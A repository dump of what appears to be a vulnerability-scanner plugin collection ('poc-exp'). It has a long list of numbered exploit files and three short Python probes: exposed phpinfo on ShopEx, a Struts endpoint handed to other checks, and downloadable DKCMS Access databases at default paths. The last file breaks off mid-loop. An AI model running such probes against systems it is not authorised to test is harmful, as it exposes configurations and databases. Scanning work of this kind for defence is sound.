├── DNS.py ├── README.md ├── bugscan_exec.py ├── exp_list ├── decode.py ├── exp-103.py ├── exp-104.py ├── exp-1046.py ├── exp-105.py ├── exp-1050.py ├── exp-1051.py ├── exp-1052.py ├── exp-1058.py ├── exp-106.py ├── exp-1060.py ├── exp-1061.py ├── exp-1063.py ├── exp-1067.py ├── exp-1068.py ├── exp-1069.py ├── exp-107.py ├── exp-1072.py ├── exp-1073.py ├── exp-1074.py ├── exp-1076.py ├── exp-108.py ├── exp-1082.py ├── exp-1083.py ├── exp-1102.py ├── exp-1103.py ├── exp-1104.py ├── exp-1105.py ├── exp-1107.py ├── exp-1108.py ├── exp-1109.py ├── exp-1111.py ├── exp-1113.py ├── exp-1114.py ├── exp-1118.py ├── exp-1119.py ├── exp-1121.py ├── exp-1122.py ├── exp-1123.py ├── exp-1124.py ├── exp-1125.py ├── exp-1126.py ├── exp-1127.py ├── exp-113.py ├── exp-1130.py ├── exp-1132.py ├── exp-1136.py ├── exp-1138.py ├── exp-1139.py ├── exp-1140.py ├── exp-1141.py ├── exp-1143.py ├── exp-1144.py ├── exp-1146.py ├── exp-1148.py ├── exp-1149.py ├── exp-1150.py ├── exp-1151.py ├── exp-1152.py ├── exp-1153.py ├── exp-1160.py ├── exp-1161.py ├── exp-1162.py ├── exp-1164.py ├── exp-1165.py ├── exp-1168.py ├── exp-1169.py ├── exp-1170.py ├── exp-1171.py ├── exp-1172.py ├── exp-1176.py ├── exp-1177.py ├── exp-1179.py ├── exp-118.py ├── exp-1182.py ├── exp-1183.py ├── exp-1185.py ├── exp-1186.py ├── exp-1189.py ├── exp-1190.py ├── exp-1192.py ├── exp-1193.py ├── exp-1194.py ├── exp-1195.py ├── exp-1199.py ├── exp-120.py ├── exp-1200.py ├── exp-1201.py ├── exp-1202.py ├── exp-1203.py ├── exp-1204.py ├── exp-1218.py ├── exp-1219.py ├── exp-1223.py ├── exp-1224.py ├── exp-1225.py ├── exp-1226.py ├── exp-1227.py ├── exp-1228.py ├── exp-1230.py ├── exp-1231.py ├── exp-1232.py ├── exp-1233.py ├── exp-1235.py ├── exp-1236.py ├── exp-1237.py ├── exp-1238.py ├── exp-1252.py ├── exp-1253.py ├── exp-1254.py ├── exp-1255.py ├── exp-1257.py ├── exp-1258.py ├── exp-1260.py ├── exp-1262.py ├── exp-1263.py ├── exp-1264.py ├── exp-1267.py ├── exp-1268.py ├── exp-127.py ├── exp-1271.py ├── exp-1272.py 
├── exp-1273.py ├── exp-1274.py ├── exp-1275.py ├── exp-1276.py ├── exp-1277.py ├── exp-1278.py ├── exp-1279.py ├── exp-128.py ├── exp-1280.py ├── exp-1283.py ├── exp-1284.py ├── exp-1285.py ├── exp-1286.py ├── exp-1288.py ├── exp-1289.py ├── exp-129.py ├── exp-1290.py ├── exp-1292.py ├── exp-130.py ├── exp-1300.py ├── exp-1303.py ├── exp-1304.py ├── exp-131.py ├── exp-1323.py ├── exp-1328.py ├── exp-133.py ├── exp-1332.py ├── exp-1335.py ├── exp-1336.py ├── exp-1339.py ├── exp-134.py ├── exp-1340.py ├── exp-1341.py ├── exp-1344.py ├── exp-1349.py ├── exp-1351.py ├── exp-1352.py ├── exp-1354.py ├── exp-1356.py ├── exp-1358.py ├── exp-1359.py ├── exp-1363.py ├── exp-1364.py ├── exp-1365.py ├── exp-1368.py ├── exp-1376.py ├── exp-138.py ├── exp-139.py ├── exp-1393.py ├── exp-140.py ├── exp-1406.py ├── exp-1408.py ├── exp-141.py ├── exp-1412.py ├── exp-1417.py ├── exp-1418.py ├── exp-1419.py ├── exp-142.py ├── exp-1422.py ├── exp-1424.py ├── exp-143.py ├── exp-1435.py ├── exp-1437.py ├── exp-1438.py ├── exp-144.py ├── exp-1441.py ├── exp-1442.py ├── exp-1447.py ├── exp-1448.py ├── exp-1449.py ├── exp-1454.py ├── exp-1457.py ├── exp-1461.py ├── exp-1463.py ├── exp-1466.py ├── exp-147.py ├── exp-1470.py ├── exp-1473.py ├── exp-1475.py ├── exp-1476.py ├── exp-1479.py ├── exp-1481.py ├── exp-1483.py ├── exp-1484.py ├── exp-1485.py ├── exp-1489.py ├── exp-1490.py ├── exp-1492.py ├── exp-1494.py ├── exp-1497.py ├── exp-1502.py ├── exp-1503.py ├── exp-1507.py ├── exp-152.py ├── exp-1521.py ├── exp-1525.py ├── exp-1526.py ├── exp-1530.py ├── exp-1545.py ├── exp-155.py ├── exp-1553.py ├── exp-1556.py ├── exp-1559.py ├── exp-156.py ├── exp-1561.py ├── exp-157.py ├── exp-158.py ├── exp-1582.py ├── exp-159.py ├── exp-1592.py ├── exp-1595.py ├── exp-1597.py ├── exp-160.py ├── exp-1604.py ├── exp-1606.py ├── exp-161.py ├── exp-1616.py ├── exp-162.py ├── exp-1626.py ├── exp-1628.py ├── exp-1629.py ├── exp-163.py ├── exp-1633.py ├── exp-1634.py ├── exp-1635.py ├── exp-1637.py ├── 
exp-1639.py ├── exp-164.py ├── exp-1644.py ├── exp-1645.py ├── exp-1646.py ├── exp-1647.py ├── exp-1655.py ├── exp-1656.py ├── exp-1657.py ├── exp-166.py ├── exp-1662.py ├── exp-1664.py ├── exp-1666.py ├── exp-1667.py ├── exp-1668.py ├── exp-167.py ├── exp-1670.py ├── exp-1671.py ├── exp-1672.py ├── exp-1674.py ├── exp-1675.py ├── exp-1676.py ├── exp-1677.py ├── exp-168.py ├── exp-1680.py ├── exp-1681.py ├── exp-1687.py ├── exp-169.py ├── exp-1690.py ├── exp-1692.py ├── exp-1693.py ├── exp-1697.py ├── exp-170.py ├── exp-1702.py ├── exp-1704.py ├── exp-1706.py ├── exp-1707.py ├── exp-1709.py ├── exp-171.py ├── exp-1710.py ├── exp-1713.py ├── exp-1715.py ├── exp-1717.py ├── exp-1718.py ├── exp-172.py ├── exp-1721.py ├── exp-1723.py ├── exp-1725.py ├── exp-1739.py ├── exp-174.py ├── exp-1740.py ├── exp-1741.py ├── exp-1742.py ├── exp-1744.py ├── exp-1746.py ├── exp-1748.py ├── exp-1749.py ├── exp-175.py ├── exp-1750.py ├── exp-1753.py ├── exp-1754.py ├── exp-1755.py ├── exp-1757.py ├── exp-176.py ├── exp-1769.py ├── exp-177.py ├── exp-1770.py ├── exp-1773.py ├── exp-1774.py ├── exp-1775.py ├── exp-1776.py ├── exp-1777.py ├── exp-1778.py ├── exp-1779.py ├── exp-1780.py ├── exp-1781.py ├── exp-1783.py ├── exp-1784.py ├── exp-1785.py ├── exp-1788.py ├── exp-179.py ├── exp-1791.py ├── exp-1792.py ├── exp-1793.py ├── exp-1796.py ├── exp-1797.py ├── exp-1798.py ├── exp-1799.py ├── exp-1801.py ├── exp-1805.py ├── exp-1806.py ├── exp-1807.py ├── exp-181.py ├── exp-1810.py ├── exp-1814.py ├── exp-1815.py ├── exp-1816.py ├── exp-1817.py ├── exp-1818.py ├── exp-1819.py ├── exp-182.py ├── exp-1821.py ├── exp-1822.py ├── exp-1823.py ├── exp-1824.py ├── exp-1826.py ├── exp-1827.py ├── exp-1828.py ├── exp-1829.py ├── exp-1831.py ├── exp-1832.py ├── exp-1833.py ├── exp-1834.py ├── exp-1835.py ├── exp-1836.py ├── exp-1837.py ├── exp-1838.py ├── exp-184.py ├── exp-1846.py ├── exp-1847.py ├── exp-1848.py ├── exp-1849.py ├── exp-1852.py ├── exp-1853.py ├── exp-1861.py ├── exp-1862.py ├── 
exp-1863.py ├── exp-1864.py ├── exp-1865.py ├── exp-1866.py ├── exp-1868.py ├── exp-1871.py ├── exp-1872.py ├── exp-1874.py ├── exp-1875.py ├── exp-1879.py ├── exp-1880.py ├── exp-1881.py ├── exp-1885.py ├── exp-1888.py ├── exp-1889.py ├── exp-1891.py ├── exp-1894.py ├── exp-1896.py ├── exp-1897.py ├── exp-1898.py ├── exp-1901.py ├── exp-1902.py ├── exp-1903.py ├── exp-1906.py ├── exp-1909.py ├── exp-1910.py ├── exp-1912.py ├── exp-1913.py ├── exp-1914.py ├── exp-1915.py ├── exp-1917.py ├── exp-1918.py ├── exp-1919.py ├── exp-1920.py ├── exp-1921.py ├── exp-1922.py ├── exp-1924.py ├── exp-1925.py ├── exp-1926.py ├── exp-1927.py ├── exp-1928.py ├── exp-193.py ├── exp-1930.py ├── exp-1933.py ├── exp-1934.py ├── exp-1936.py ├── exp-1937.py ├── exp-1939.py ├── exp-1941.py ├── exp-1942.py ├── exp-1943.py ├── exp-1944.py ├── exp-1945.py ├── exp-1946.py ├── exp-1947.py ├── exp-1948.py ├── exp-195.py ├── exp-1950.py ├── exp-1951.py ├── exp-1952.py ├── exp-1953.py ├── exp-1954.py ├── exp-1956.py ├── exp-1957.py ├── exp-1959.py ├── exp-1961.py ├── exp-1962.py ├── exp-1963.py ├── exp-1965.py ├── exp-1966.py ├── exp-1967.py ├── exp-1968.py ├── exp-1969.py ├── exp-1970.py ├── exp-1974.py ├── exp-1977.py ├── exp-1978.py ├── exp-1979.py ├── exp-1981.py ├── exp-1982.py ├── exp-1984.py ├── exp-1985.py ├── exp-1986.py ├── exp-1987.py ├── exp-1988.py ├── exp-1989.py ├── exp-1990.py ├── exp-1993.py ├── exp-1996.py ├── exp-1997.py ├── exp-1998.py ├── exp-1999.py ├── exp-200.py ├── exp-2000.py ├── exp-2001.py ├── exp-2002.py ├── exp-2003.py ├── exp-2004.py ├── exp-2005.py ├── exp-2007.py ├── exp-2008.py ├── exp-2009.py ├── exp-2010.py ├── exp-2011.py ├── exp-2016.py ├── exp-2019.py ├── exp-202.py ├── exp-2020.py ├── exp-2021.py ├── exp-2022.py ├── exp-2024.py ├── exp-2025.py ├── exp-2026.py ├── exp-2029.py ├── exp-2031.py ├── exp-2032.py ├── exp-2033.py ├── exp-2034.py ├── exp-2035.py ├── exp-2038.py ├── exp-204.py ├── exp-2041.py ├── exp-2042.py ├── exp-2043.py ├── exp-2044.py ├── 
exp-2047.py ├── exp-2049.py ├── exp-205.py ├── exp-2050.py ├── exp-2051.py ├── exp-2052.py ├── exp-2054.py ├── exp-2069.py ├── exp-2070.py ├── exp-2071.py ├── exp-2074.py ├── exp-2075.py ├── exp-2077.py ├── exp-2079.py ├── exp-208.py ├── exp-2080.py ├── exp-2084.py ├── exp-2089.py ├── exp-2091.py ├── exp-2092.py ├── exp-2094.py ├── exp-2097.py ├── exp-2098.py ├── exp-2099.py ├── exp-2100.py ├── exp-2101.py ├── exp-2104.py ├── exp-2105.py ├── exp-2106.py ├── exp-2107.py ├── exp-2108.py ├── exp-2109.py ├── exp-2114.py ├── exp-2115.py ├── exp-2116.py ├── exp-2117.py ├── exp-2119.py ├── exp-2130.py ├── exp-2132.py ├── exp-2134.py ├── exp-2136.py ├── exp-2138.py ├── exp-2139.py ├── exp-2140.py ├── exp-2143.py ├── exp-2144.py ├── exp-2146.py ├── exp-2149.py ├── exp-2151.py ├── exp-2153.py ├── exp-2155.py ├── exp-2158.py ├── exp-2159.py ├── exp-2160.py ├── exp-2161.py ├── exp-2162.py ├── exp-2163.py ├── exp-2164.py ├── exp-2166.py ├── exp-2170.py ├── exp-2171.py ├── exp-2173.py ├── exp-2174.py ├── exp-2178.py ├── exp-2183.py ├── exp-2184.py ├── exp-2185.py ├── exp-2188.py ├── exp-2189.py ├── exp-219.py ├── exp-2193.py ├── exp-2194.py ├── exp-2195.py ├── exp-2196.py ├── exp-2197.py ├── exp-2198.py ├── exp-220.py ├── exp-2201.py ├── exp-2202.py ├── exp-2203.py ├── exp-2204.py ├── exp-2205.py ├── exp-2206.py ├── exp-2210.py ├── exp-2212.py ├── exp-2215.py ├── exp-2216.py ├── exp-2219.py ├── exp-2220.py ├── exp-2228.py ├── exp-2229.py ├── exp-2230.py ├── exp-2231.py ├── exp-2232.py ├── exp-2234.py ├── exp-2236.py ├── exp-2237.py ├── exp-2238.py ├── exp-2241.py ├── exp-2242.py ├── exp-2243.py ├── exp-2244.py ├── exp-2245.py ├── exp-2248.py ├── exp-2250.py ├── exp-2251.py ├── exp-2252.py ├── exp-2253.py ├── exp-2262.py ├── exp-2269.py ├── exp-2272.py ├── exp-2274.py ├── exp-2282.py ├── exp-2283.py ├── exp-2284.py ├── exp-2285.py ├── exp-2286.py ├── exp-2287.py ├── exp-2288.py ├── exp-2289.py ├── exp-2291.py ├── exp-2294.py ├── exp-2295.py ├── exp-2296.py ├── exp-2297.py ├── 
exp-2298.py ├── exp-2299.py ├── exp-2301.py ├── exp-2302.py ├── exp-2303.py ├── exp-2305.py ├── exp-2306.py ├── exp-2307.py ├── exp-2308.py ├── exp-2309.py ├── exp-2310.py ├── exp-2311.py ├── exp-2312.py ├── exp-2313.py ├── exp-2314.py ├── exp-2315.py ├── exp-2316.py ├── exp-2317.py ├── exp-2318.py ├── exp-2320.py ├── exp-2321.py ├── exp-2322.py ├── exp-2337.py ├── exp-2338.py ├── exp-2339.py ├── exp-234.py ├── exp-2340.py ├── exp-2341.py ├── exp-2342.py ├── exp-2343.py ├── exp-2345.py ├── exp-2346.py ├── exp-2347.py ├── exp-2348.py ├── exp-2350.py ├── exp-2351.py ├── exp-2353.py ├── exp-2354.py ├── exp-2355.py ├── exp-2357.py ├── exp-236.py ├── exp-2361.py ├── exp-2362.py ├── exp-2363.py ├── exp-2365.py ├── exp-2366.py ├── exp-2367.py ├── exp-2369.py ├── exp-237.py ├── exp-2370.py ├── exp-2371.py ├── exp-2372.py ├── exp-2373.py ├── exp-2374.py ├── exp-2375.py ├── exp-2376.py ├── exp-2377.py ├── exp-2378.py ├── exp-2379.py ├── exp-238.py ├── exp-2380.py ├── exp-2381.py ├── exp-2382.py ├── exp-2383.py ├── exp-2384.py ├── exp-2385.py ├── exp-2386.py ├── exp-2387.py ├── exp-2388.py ├── exp-2390.py ├── exp-2391.py ├── exp-2392.py ├── exp-2393.py ├── exp-2394.py ├── exp-2395.py ├── exp-240.py ├── exp-2403.py ├── exp-2405.py ├── exp-2406.py ├── exp-2408.py ├── exp-241.py ├── exp-2419.py ├── exp-2420.py ├── exp-2421.py ├── exp-2422.py ├── exp-2423.py ├── exp-2424.py ├── exp-2425.py ├── exp-2426.py ├── exp-2431.py ├── exp-2439.py ├── exp-2441.py ├── exp-2442.py ├── exp-2443.py ├── exp-2446.py ├── exp-2453.py ├── exp-2455.py ├── exp-2456.py ├── exp-2457.py ├── exp-2458.py ├── exp-2459.py ├── exp-246.py ├── exp-2462.py ├── exp-2467.py ├── exp-2469.py ├── exp-2471.py ├── exp-2473.py ├── exp-2474.py ├── exp-2477.py ├── exp-2478.py ├── exp-2482.py ├── exp-2488.py ├── exp-2492.py ├── exp-2493.py ├── exp-2494.py ├── exp-2495.py ├── exp-2496.py ├── exp-2498.py ├── exp-2499.py ├── exp-250.py ├── exp-2500.py ├── exp-2502.py ├── exp-2506.py ├── exp-251.py ├── exp-2517.py ├── 
exp-2518.py ├── exp-2522.py ├── exp-2528.py ├── exp-2529.py ├── exp-253.py ├── exp-2534.py ├── exp-2539.py ├── exp-254.py ├── exp-2542.py ├── exp-2544.py ├── exp-2547.py ├── exp-2548.py ├── exp-2549.py ├── exp-255.py ├── exp-2550.py ├── exp-2551.py ├── exp-2552.py ├── exp-2553.py ├── exp-2554.py ├── exp-2555.py ├── exp-2556.py ├── exp-2557.py ├── exp-2559.py ├── exp-2562.py ├── exp-2563.py ├── exp-2564.py ├── exp-2565.py ├── exp-2566.py ├── exp-2567.py ├── exp-2568.py ├── exp-2570.py ├── exp-2571.py ├── exp-2572.py ├── exp-2575.py ├── exp-2576.py ├── exp-2578.py ├── exp-2580.py ├── exp-2581.py ├── exp-2583.py ├── exp-2586.py ├── exp-2588.py ├── exp-2589.py ├── exp-2590.py ├── exp-2591.py ├── exp-2592.py ├── exp-2593.py ├── exp-2594.py ├── exp-2595.py ├── exp-2597.py ├── exp-2598.py ├── exp-2599.py ├── exp-2603.py ├── exp-2604.py ├── exp-2605.py ├── exp-2606.py ├── exp-2607.py ├── exp-2609.py ├── exp-261.py ├── exp-2610.py ├── exp-2611.py ├── exp-2612.py ├── exp-2613.py ├── exp-2614.py ├── exp-2616.py ├── exp-2617.py ├── exp-2618.py ├── exp-2619.py ├── exp-2620.py ├── exp-2621.py ├── exp-2622.py ├── exp-2623.py ├── exp-2624.py ├── exp-2625.py ├── exp-2627.py ├── exp-2628.py ├── exp-2629.py ├── exp-263.py ├── exp-2631.py ├── exp-2632.py ├── exp-2633.py ├── exp-2634.py ├── exp-2635.py ├── exp-2636.py ├── exp-2639.py ├── exp-2640.py ├── exp-2641.py ├── exp-2642.py ├── exp-2643.py ├── exp-2645.py ├── exp-2647.py ├── exp-2648.py ├── exp-2650.py ├── exp-2654.py ├── exp-2655.py ├── exp-2656.py ├── exp-2658.py ├── exp-2659.py ├── exp-266.py ├── exp-2660.py ├── exp-2661.py ├── exp-2663.py ├── exp-2667.py ├── exp-2668.py ├── exp-267.py ├── exp-2670.py ├── exp-2671.py ├── exp-2672.py ├── exp-2673.py ├── exp-2675.py ├── exp-2676.py ├── exp-2678.py ├── exp-2679.py ├── exp-2681.py ├── exp-2682.py ├── exp-2683.py ├── exp-2684.py ├── exp-2685.py ├── exp-2686.py ├── exp-2687.py ├── exp-2688.py ├── exp-2689.py ├── exp-2690.py ├── exp-2691.py ├── exp-2692.py ├── exp-2693.py ├── 
exp-2696.py ├── exp-2697.py ├── exp-2699.py ├── exp-2700.py ├── exp-2701.py ├── exp-2702.py ├── exp-2703.py ├── exp-2705.py ├── exp-2706.py ├── exp-2707.py ├── exp-2708.py ├── exp-2709.py ├── exp-2710.py ├── exp-2711.py ├── exp-2712.py ├── exp-2713.py ├── exp-2714.py ├── exp-2715.py ├── exp-2716.py ├── exp-2717.py ├── exp-2718.py ├── exp-2719.py ├── exp-2720.py ├── exp-2722.py ├── exp-2723.py ├── exp-2724.py ├── exp-2726.py ├── exp-2727.py ├── exp-2729.py ├── exp-2730.py ├── exp-2731.py ├── exp-2732.py ├── exp-2733.py ├── exp-2734.py ├── exp-2735.py ├── exp-2737.py ├── exp-2738.py ├── exp-2739.py ├── exp-274.py ├── exp-2740.py ├── exp-2741.py ├── exp-2742.py ├── exp-2744.py ├── exp-2745.py ├── exp-2746.py ├── exp-2748.py ├── exp-2751.py ├── exp-2752.py ├── exp-2753.py ├── exp-2760.py ├── exp-2762.py ├── exp-2763.py ├── exp-2764.py ├── exp-2765.py ├── exp-2766.py ├── exp-2767.py ├── exp-2768.py ├── exp-2770.py ├── exp-2771.py ├── exp-2775.py ├── exp-2776.py ├── exp-2777.py ├── exp-2778.py ├── exp-278.py ├── exp-2780.py ├── exp-2781.py ├── exp-2782.py ├── exp-2783.py ├── exp-2784.py ├── exp-2787.py ├── exp-2788.py ├── exp-2794.py ├── exp-2798.py ├── exp-2799.py ├── exp-2801.py ├── exp-2802.py ├── exp-2803.py ├── exp-2809.py ├── exp-2820.py ├── exp-2821.py ├── exp-284.py ├── exp-285.py ├── exp-287.py ├── exp-289.py ├── exp-290.py ├── exp-291.py ├── exp-293.py ├── exp-294.py ├── exp-297.py ├── exp-298.py ├── exp-299.py ├── exp-302.py ├── exp-303.py ├── exp-304.py ├── exp-307.py ├── exp-314.py ├── exp-315.py ├── exp-317.py ├── exp-319.py ├── exp-321.py ├── exp-324.py ├── exp-333.py ├── exp-337.py ├── exp-342.py ├── exp-343.py ├── exp-344.py ├── exp-345.py ├── exp-346.py ├── exp-347.py ├── exp-349.py ├── exp-351.py ├── exp-356.py ├── exp-361.py ├── exp-363.py ├── exp-373.py ├── exp-374.py ├── exp-376.py ├── exp-377.py ├── exp-379.py ├── exp-383.py ├── exp-384.py ├── exp-385.py ├── exp-386.py ├── exp-387.py ├── exp-388.py ├── exp-389.py ├── exp-390.py ├── exp-391.py ├── 
exp-392.py ├── exp-394.py ├── exp-395.py ├── exp-397.py ├── exp-398.py ├── exp-4.py ├── exp-401.py ├── exp-407.py ├── exp-408.py ├── exp-41.py ├── exp-411.py ├── exp-412.py ├── exp-414.py ├── exp-417.py ├── exp-418.py ├── exp-419.py ├── exp-420.py ├── exp-421.py ├── exp-422.py ├── exp-427.py ├── exp-428.py ├── exp-431.py ├── exp-432.py ├── exp-433.py ├── exp-434.py ├── exp-436.py ├── exp-439.py ├── exp-440.py ├── exp-442.py ├── exp-443.py ├── exp-445.py ├── exp-448.py ├── exp-449.py ├── exp-450.py ├── exp-456.py ├── exp-465.py ├── exp-466.py ├── exp-467.py ├── exp-469.py ├── exp-47.py ├── exp-470.py ├── exp-471.py ├── exp-473.py ├── exp-474.py ├── exp-475.py ├── exp-478.py ├── exp-479.py ├── exp-480.py ├── exp-481.py ├── exp-482.py ├── exp-483.py ├── exp-484.py ├── exp-485.py ├── exp-486.py ├── exp-488.py ├── exp-489.py ├── exp-490.py ├── exp-491.py ├── exp-495.py ├── exp-501.py ├── exp-502.py ├── exp-509.py ├── exp-510.py ├── exp-511.py ├── exp-512.py ├── exp-52.py ├── exp-521.py ├── exp-528.py ├── exp-529.py ├── exp-53.py ├── exp-530.py ├── exp-543.py ├── exp-546.py ├── exp-554.py ├── exp-555.py ├── exp-557.py ├── exp-558.py ├── exp-559.py ├── exp-56.py ├── exp-560.py ├── exp-561.py ├── exp-562.py ├── exp-564.py ├── exp-570.py ├── exp-572.py ├── exp-574.py ├── exp-576.py ├── exp-580.py ├── exp-586.py ├── exp-588.py ├── exp-590.py ├── exp-592.py ├── exp-593.py ├── exp-594.py ├── exp-595.py ├── exp-596.py ├── exp-600.py ├── exp-602.py ├── exp-606.py ├── exp-607.py ├── exp-609.py ├── exp-612.py ├── exp-613.py ├── exp-616.py ├── exp-617.py ├── exp-619.py ├── exp-622.py ├── exp-623.py ├── exp-624.py ├── exp-631.py ├── exp-640.py ├── exp-657.py ├── exp-67.py ├── exp-679.py ├── exp-68.py ├── exp-682.py ├── exp-683.py ├── exp-685.py ├── exp-687.py ├── exp-688.py ├── exp-689.py ├── exp-69.py ├── exp-690.py ├── exp-695.py ├── exp-697.py ├── exp-701.py ├── exp-702.py ├── exp-727.py ├── exp-732.py ├── exp-733.py ├── exp-739.py ├── exp-740.py ├── exp-744.py ├── exp-745.py ├── 
exp-746.py ├── exp-747.py ├── exp-748.py ├── exp-749.py ├── exp-750.py ├── exp-753.py ├── exp-755.py ├── exp-756.py ├── exp-758.py ├── exp-759.py ├── exp-761.py ├── exp-773.py ├── exp-777.py ├── exp-779.py ├── exp-78.py ├── exp-785.py ├── exp-788.py ├── exp-790.py ├── exp-793.py ├── exp-80.py ├── exp-802.py ├── exp-803.py ├── exp-804.py ├── exp-806.py ├── exp-807.py ├── exp-808.py ├── exp-81.py ├── exp-815.py ├── exp-817.py ├── exp-821.py ├── exp-823.py ├── exp-826.py ├── exp-827.py ├── exp-828.py ├── exp-830.py ├── exp-831.py ├── exp-832.py ├── exp-834.py ├── exp-837.py ├── exp-838.py ├── exp-839.py ├── exp-840.py ├── exp-841.py ├── exp-842.py ├── exp-843.py ├── exp-847.py ├── exp-848.py ├── exp-849.py ├── exp-850.py ├── exp-851.py ├── exp-852.py ├── exp-853.py ├── exp-854.py ├── exp-856.py ├── exp-858.py ├── exp-860.py ├── exp-861.py ├── exp-862.py ├── exp-864.py ├── exp-865.py ├── exp-867.py ├── exp-868.py ├── exp-869.py ├── exp-875.py ├── exp-876.py ├── exp-877.py ├── exp-878.py ├── exp-885.py ├── exp-887.py ├── exp-889.py ├── exp-890.py ├── exp-893.py ├── exp-895.py ├── exp-899.py ├── exp-901.py ├── exp-929.py ├── exp-930.py ├── exp-931.py ├── exp-946.py ├── exp-948.py ├── exp-951.py ├── exp-954.py ├── exp-955.py ├── exp-956.py ├── exp-957.py ├── exp-97.py ├── exp-99.py ├── exp-back_100.pyc_dis.py ├── exp-back_101.pyc_dis.py ├── exp-back_102.pyc_dis.py ├── exp-back_1054.pyc_dis.py ├── exp-back_1055.pyc_dis.py ├── exp-back_1056.pyc_dis.py ├── exp-back_1062.pyc_dis.py ├── exp-back_1070.pyc_dis.py ├── exp-back_1071.pyc_dis.py ├── exp-back_11.pyc_dis.py ├── exp-back_12.pyc_dis.py ├── exp-back_13.pyc_dis.py ├── exp-back_15.pyc_dis.py ├── exp-back_16.pyc_dis.py ├── exp-back_17.pyc_dis.py ├── exp-back_1745.pyc_dis.py ├── exp-back_1756.pyc_dis.py ├── exp-back_1766.pyc_dis.py ├── exp-back_1782.pyc_dis.py ├── exp-back_1786.pyc_dis.py ├── exp-back_18.pyc_dis.py ├── exp-back_189.pyc_dis.py ├── exp-back_19.pyc_dis.py ├── exp-back_1994.pyc_dis.py ├── 
exp-back_1995.pyc_dis.py ├── exp-back_20.pyc_dis.py ├── exp-back_2065.pyc_dis.py ├── exp-back_2066.pyc_dis.py ├── exp-back_2067.pyc_dis.py ├── exp-back_2078.pyc_dis.py ├── exp-back_2083.pyc_dis.py ├── exp-back_2110.pyc_dis.py ├── exp-back_2112.pyc_dis.py ├── exp-back_22.pyc_dis.py ├── exp-back_23.pyc_dis.py ├── exp-back_24.pyc_dis.py ├── exp-back_25.pyc_dis.py ├── exp-back_26.pyc_dis.py ├── exp-back_27.pyc_dis.py ├── exp-back_28.pyc_dis.py ├── exp-back_29.pyc_dis.py ├── exp-back_30.pyc_dis.py ├── exp-back_33.pyc_dis.py ├── exp-back_34.pyc_dis.py ├── exp-back_35.pyc_dis.py ├── exp-back_36.pyc_dis.py ├── exp-back_37.pyc_dis.py ├── exp-back_38.pyc_dis.py ├── exp-back_39.pyc_dis.py ├── exp-back_45.pyc_dis.py ├── exp-back_46.pyc_dis.py ├── exp-back_54.pyc_dis.py ├── exp-back_57.pyc_dis.py ├── exp-back_58.pyc_dis.py ├── exp-back_59.pyc_dis.py ├── exp-back_6.pyc_dis.py ├── exp-back_60.pyc_dis.py ├── exp-back_61.pyc_dis.py ├── exp-back_62.pyc_dis.py ├── exp-back_63.pyc_dis.py ├── exp-back_64.pyc_dis.py ├── exp-back_641.pyc_dis.py ├── exp-back_65.pyc_dis.py ├── exp-back_7.pyc_dis.py ├── exp-back_70.pyc_dis.py ├── exp-back_71.pyc_dis.py ├── exp-back_72.pyc_dis.py ├── exp-back_73.pyc_dis.py ├── exp-back_74.pyc_dis.py ├── exp-back_75.pyc_dis.py ├── exp-back_76.pyc_dis.py ├── exp-back_77.pyc_dis.py ├── exp-back_8.pyc_dis.py ├── exp-back_811.pyc_dis.py ├── exp-back_82.pyc_dis.py ├── exp-back_83.pyc_dis.py ├── exp-back_84.pyc_dis.py ├── exp-back_85.pyc_dis.py ├── exp-back_86.pyc_dis.py ├── exp-back_87.pyc_dis.py ├── exp-back_88.pyc_dis.py ├── exp-back_89.pyc_dis.py ├── exp-back_9.pyc_dis.py ├── exp-back_953.pyc_dis.py ├── exp-back_98.pyc_dis.py └── info.txt ├── miniCurl.py └── threadpool.py /README.md: -------------------------------------------------------------------------------- 1 | # poc-exp 2 | -------------------------------------------------------------------------------- /exp_list/exp-103.py: -------------------------------------------------------------------------------- 
#!/usr/bin/env python
# -*- coding: utf-8 -*-

def assign(service, arg):
    """Claim the target when the fingerprinted service is "shopex".

    Returns (True, arg) for a ShopEx target and None (implicitly falsy) for
    every other service name.
    """
    if service != "shopex":
        return None
    return True, arg


def audit(arg):
    """Report a ShopEx site that still serves svinfo.php with phpinfo output.

    `arg` is the base URL; it is concatenated directly with the relative
    path, so it is expected to end with a slash (the self-test below passes
    one). The first directory whose response body contains 'phpinfo()' is
    reported through security_info and the search stops. A finding means
    server configuration is readable by anyone who can reach that path.

    `curl` and `security_info` are not defined in this file -- presumably
    supplied by the scanner framework (the self-test pulls names in from
    `dummy`).
    """
    for subdir in ('app/dev/', 'install/'):
        probe_url = arg + subdir + 'svinfo.php?phpinfo=true'
        # Only the third element of the 5-tuple (response body) is used here.
        _, _, body, _, _ = curl.curl(probe_url)
        if not body or 'phpinfo()' not in body:
            continue
        security_info(probe_url)
        break


if __name__ == '__main__':
    from dummy import *
    _, base_url = assign('shopex', 'http://www.finialshop.com/')
    audit(base_url)

--------------------------------------------------------------------------------
/exp_list/exp-1046.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- encoding:utf-8 -*-
#ref http://wooyun.org/bugs/wooyun-2015-0104880

import urlparse  # Python 2 module name


def assign(service, arg):
    """Turn a generic 'www' target into the .action endpoint to be checked.

    Only the scheme and host[:port] of `arg` are kept; the path is replaced
    with the fixed getVoteRecordByManuscriptId.action endpoint. Returns
    (True, endpoint_url), or None for any other service name.
    """
    if service != 'www':
        return None
    parts = urlparse.urlparse(arg)
    endpoint = '%s://%s/website-rank/getVoteRecordByManuscriptId.action' % (parts.scheme, parts.netloc)
    return True, endpoint


def audit(arg):
    """Queue the endpoint for the 'struts' checks; no request is made here.

    `task_push` is not defined in this file -- presumably the framework's
    way of handing a URL to another plugin family.
    """
    task_push('struts', arg)


if __name__ == '__main__':
    from dummy import *
    _, endpoint_url = assign('www', 'http://www.example.com:88/')
    audit(endpoint_url)

--------------------------------------------------------------------------------
/exp_list/exp-105.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'Ario'

def assign(service, arg):
    """Claim the target when the fingerprinted service is "dkcms".

    Returns (True, arg) on a match and None otherwise.
    """
    if service != "dkcms":
        return None
    return True, arg


def audit(arg):
    """Report a DKCMS site whose Access database file is downloadable.

    Sends a header-only request ('-I') for each known default .mdb path
    below the base URL `arg`. A 200 status together with an
    'application/x-msaccess' header value means the database is served as a
    static file; the first such URL is reported through security_hole and
    the search stops.
    """
    default_db_paths = (
        'data/dkcm_ssdfhwejkfs.mdb',
        '_data/___dkcms_30_free.mdb',
        '_data/I^(()UU()H.mdb',
    )
    for rel_path in default_db_paths:
